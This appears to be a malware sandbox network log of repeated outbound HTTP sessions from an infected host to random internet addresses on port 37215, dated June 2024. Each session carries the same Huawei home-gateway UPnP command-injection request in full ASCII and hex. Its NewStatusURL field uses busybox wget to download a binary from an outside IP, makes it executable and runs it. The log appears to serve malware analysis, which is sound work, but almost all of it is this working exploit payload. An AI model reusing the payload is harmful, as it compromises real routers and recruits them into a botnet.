                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              712192.168.2.1550424156.71.17.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225898981 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              713192.168.2.1538172222.255.128.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225902081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              714192.168.2.1553376197.159.102.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225944996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              715192.168.2.155474037.146.137.21637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225975037 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              716192.168.2.155657845.245.241.1937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225976944 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              717192.168.2.1535110222.218.79.16937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226018906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              718192.168.2.1550778190.92.201.19237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226021051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              719192.168.2.155854894.246.192.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226042032 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              720192.168.2.1550152121.156.236.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226073027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              721192.168.2.1545514222.202.52.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226130962 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              722192.168.2.1541458157.228.202.25037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226149082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
